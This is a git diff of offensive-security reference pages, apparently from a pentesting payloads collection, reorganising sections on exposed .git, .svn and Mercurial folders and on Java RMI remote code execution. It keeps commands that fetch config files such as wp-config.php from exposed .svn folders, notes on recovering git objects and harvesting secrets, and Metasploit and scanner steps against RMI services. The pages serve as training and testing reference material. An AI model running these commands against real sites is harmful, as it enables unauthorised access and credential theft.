+* [Methodology](#methodology)
* [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
* [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
* [Tools](#tools)
-* [Automatic recovery](#automatic-recovery)
- * [git-dumper.py](#git-dumperpy)
- * [diggit.py](#diggitpy)
- * [GoGitDumper](#gogitdumper)
- * [rip-git](#rip-git)
- * [GitHack](#githack)
- * [GitTools](#gittools)
-* [Harvesting secrets](#harvesting-secrets)
- * [trufflehog](#trufflehog)
- * [Yar](#yar)
- * [Gitrob](#gitrob)
- * [Gitleaks](#gitleaks)
+ * [Automatic recovery](#automatic-recovery)
+ * [git-dumper.py](#git-dumperpy)
+ * [diggit.py](#diggitpy)
+ * [GoGitDumper](#gogitdumper)
+ * [rip-git](#rip-git)
+ * [GitHack](#githack)
+ * [GitTools](#gittools)
+ * [Harvesting secrets](#harvesting-secrets)
+ * [trufflehog](#trufflehog)
+ * [Yar](#yar)
+ * [Gitrob](#gitrob)
+ * [Gitleaks](#gitleaks)
* [Refererences]
-## Example
+## Methodology
The following examples will create either a copy of the .git or a copy of the current commit.
@@ -31,6 +31,7 @@ Check for the following files, if they exist you can extract the .git folder.
- .git/HEAD
- .git/logs/HEAD
+
### Recovering file contents from .git/logs/HEAD
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
@@ -83,6 +84,7 @@ Check for the following files, if they exist you can extract the .git folder.
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
+
### Recovering file contents from .git/index
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
@@ -103,6 +105,7 @@ name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
```
+
## Tools
### Automatic recovery
@@ -166,6 +169,7 @@ git clone https://github.com/internetwache/GitTools
git checkout -- .
```
+
### Harvesting secrets
#### trufflehog
diff --git a/Insecure Source Code Management/Mercurial.md b/Insecure Source Code Management/Mercurial.md
index 5080b6b0..52dcc69e 100644
--- a/Insecure Source Code Management/Mercurial.md
+++ b/Insecure Source Code Management/Mercurial.md
@@ -1,5 +1,8 @@
# Mercurial
+> Mercurial (also known as hg from the chemical symbol for mercury) is a distributed version control system (DVCS) designed for efficiency and scalability. Developed by Matt Mackall and first released in 2005, Mercurial is known for its speed, simplicity, and ability to handle large codebases.
+
+
## Summary
* [Tools](#tools)
diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md
index a3be5d43..8daea7db 100644
--- a/Insecure Source Code Management/README.md
+++ b/Insecure Source Code Management/README.md
@@ -1,15 +1,17 @@
# Insecure Source Code Management
-Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks.
+> Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks.
## Summary
+* [Methodology](#methodology)
* [Bazaar](./Bazaar.md)
* [Git](./Git.md)
* [Mercurial](./Mercurial.md)
* [Subversion](./Subversion.md)
-* [Methodology](#methodology)
+* [Labs](#labs)
+* [References](#references)
## Methodology
@@ -26,6 +28,7 @@ The first step is to gather information about the target application. This can b
* **Manual Inspection** : Check URLs manually by navigating to common SCM paths.
* http://target.com/.git/
* http://target.com/.svn/
+
* **Automated Tools** : Refer to the page related to the specific technology.
Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules.
@@ -40,6 +43,10 @@ location /.git {
For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read.
+## Labs
+
+* [Root Me - Insecure Code Management](https://www.root-me.org/fr/Challenges/Web-Serveur/Insecure-Code-Management)
+
## References
diff --git a/Insecure Source Code Management/Subversion.md b/Insecure Source Code Management/Subversion.md
index 222ff635..6f2558af 100644
--- a/Insecure Source Code Management/Subversion.md
+++ b/Insecure Source Code Management/Subversion.md
@@ -1,14 +1,27 @@
# Subversion
+> Subversion (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.
+
+
## Summary
-* [Examples](#examples)
* [Tools](#tools)
* [svn-extractor](#svn-extractor)
+* [Methodology](#methodology)
* [References](#references)
-## Examples
+## Tools
+
+### svn-extractor
+
+* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
+ ```powershell
+ python svn-extractor.py --url "url with .svn available"
+ ```
+
+
+## Methodology
```powershell
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
@@ -25,15 +38,6 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
-## Tools
-
-### svn-extractor
-
-* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
- ```powershell
- python svn-extractor.py --url "url with .svn available"
- ```
-
## References
diff --git a/Java RMI/README.md b/Java RMI/README.md
index 41babeaa..8046afd8 100644
--- a/Java RMI/README.md
+++ b/Java RMI/README.md
@@ -2,16 +2,18 @@
> Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing.
+
## Summary
* [Tools](#tools)
* [Detection](#detection)
-* [Exploitation](#exploitation)
+* [Methodology](#methodology)
* [RCE using beanshooter](#rce-using-beanshooter)
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
* [RCE using Metasploit](#rce-using-metasploit)
* [References](#references)
+
## Tools
- [siberas/sjet](https://github.com/siberas/sjet)
@@ -19,6 +21,7 @@
- [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
- [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
+
## Detection
* Using [nmap](https://nmap.org/):
@@ -35,7 +38,7 @@
| javax.management.remote.rmi.RMIServerImpl_Stub
```
-* Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
+* Using [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
```bash
$ rmg scan 172.17.0.2 --ports 0-65535
[+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
@@ -60,7 +63,7 @@
[...]
```
-* Using Metasploit
+* Using [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework)
```bash
use auxiliary/scanner/misc/java_rmi_server
set RHOSTS
@@ -68,7 +71,7 @@
run
```
-## Exploitation
+## Methodology
If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.
@@ -134,6 +137,7 @@ set RPORT
run
```
+
## References
- [Attacking RMI based JMX services - Hans-Martin Münch - April 28, 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)